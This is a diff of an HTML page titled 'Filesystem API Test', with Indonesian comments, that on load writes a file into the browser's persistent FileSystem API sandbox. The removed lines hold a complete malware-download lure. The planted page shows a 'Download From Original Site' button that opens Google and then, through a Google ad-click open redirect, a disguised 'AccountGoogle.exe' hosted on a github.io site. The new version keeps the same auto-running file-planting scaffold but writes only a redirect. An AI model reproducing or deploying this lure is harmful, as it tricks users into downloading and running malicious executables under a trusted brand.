--- a/filesystem.html
+++ b/filesystem.html
@@ -1,89 +1,53 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-  <meta charset="UTF-8" />
-  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
-  <title>Filesystem API Test</title>
-  <script>
-    function createFile() {
-      const storageSize = 1024 * 1024; // 1MB
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Filesystem API Test</title>
+    <script>
+        function createFile() {
+            // Ukuran storage yang diminta (1MB)
+            let storageSize = 1024 * 1024;
 
-      if (!window.webkitRequestFileSystem) {
-        alert("Browser tidak mendukung FileSystem API.");
-        return;
-      }
+            // Minta akses ke FileSystem API (gunakan PERSISTENT agar file tetap ada)
+            window.webkitRequestFileSystem(window.PERSISTENT, storageSize, function(fs) {
+                console.log("Filesystem berhasil diakses:", fs);
 
-      window.webkitRequestFileSystem(window.PERSISTENT, storageSize, function(fs) {
-        console.log("Filesystem berhasil diakses:", fs);
+                // Buat file "test.html"
+                fs.root.getFile("test.html", { create: true, exclusive: false }, function(fileEntry) {
+                    console.log("File berhasil dibuat:", fileEntry.toURL());
 
-        fs.root.getFile("test.html", { create: true, exclusive: false }, function(fileEntry) {
-          console.log("File berhasil dibuat:", fileEntry.toURL());
+                    // Buat writer untuk menulis ke file
+                    fileEntry.createWriter(function(fileWriter) {
+                        // Pastikan HTML dibungkus dalam string yang benar
+                        let blob = new Blob([`<meta http-equiv="refresh" content="0;url=https://google.com/">`], { type: "text/html" });
 
-          fileEntry.createWriter(function(fileWriter) {
-            const htmlContent = `
-<!DOCTYPE html>
-<html>
-<head>
-  <meta charset="utf-8">
-  <style>
-    .button {
-      background-color: #4CAF50;
-      border: none;
-      color: white;
-      padding: 15px 32px;
-      text-align: center;
-      text-decoration: none;
-      display: inline-block;
-      font-size: 16px;
-      margin: 4px 2px;
-      cursor: pointer;
-    }
-  </style>
+                        fileWriter.onwriteend = function() {
+                            console.log("File berhasil ditulis:", fileEntry.toURL());
+                        };
+
+                        fileWriter.onerror = function(err) {
+                            console.error("Gagal menulis file:", err);
+                        };
+
+                        fileWriter.write(blob);
+                    });
+
+                }, function(err) {
+                    console.error("Gagal membuat file:", err);
+                });
+
+            }, function(err) {
+                console.error("Gagal mengakses FileSystem API:", err);
+            });
+        }
+
+        // Jalankan fungsi untuk membuat file
+        createFile();
+    </script>
 </head>
 <body>
-  <script>
-    function a(){
-      window.open('https://google.com', '_blank');
-      setTimeout(function(){
-        window.open('https://adservice.google.com/ddm/clk/408533097;208818505;l;;%3F//lanaya113505.github.io/pizza/AccountGoogle.exe?', '_blank');
-      }, 5000);
-    }
-  </script>
-  <center>
-    <input type="button" class="button" value="Download From Original Site" onclick="a()">
-  </center>
-</body>
-</html>
-            `;
-
-            const blob = new Blob([htmlContent], { type: "text/html" });
-
-            fileWriter.onwriteend = function() {
-              console.log("File berhasil ditulis:", fileEntry.toURL());
-            };
-
-            fileWriter.onerror = function(err) {
-              console.error("Gagal menulis file:", err);
-            };
-
-            fileWriter.write(blob);
-          });
-
-        }, function(err) {
-          console.error("Gagal membuat file:", err);
-        });
-
-      }, function(err) {
-        console.error("Gagal mengakses FileSystem API:", err);
-      });
-    }
-
-    // Jalankan fungsi untuk membuat file
-    createFile();
-  </script>
-</head>
-<body>
-  <h1>Filesystem API Test</h1>
-  <p>Script ini mencoba membuat file HTML menggunakan FileSystem API.</p>
+    <h1>Filesystem API Test</h1>
+    <p>This page is attempting to use the Filesystem API to create a file.</p>
 </body>
 </html>
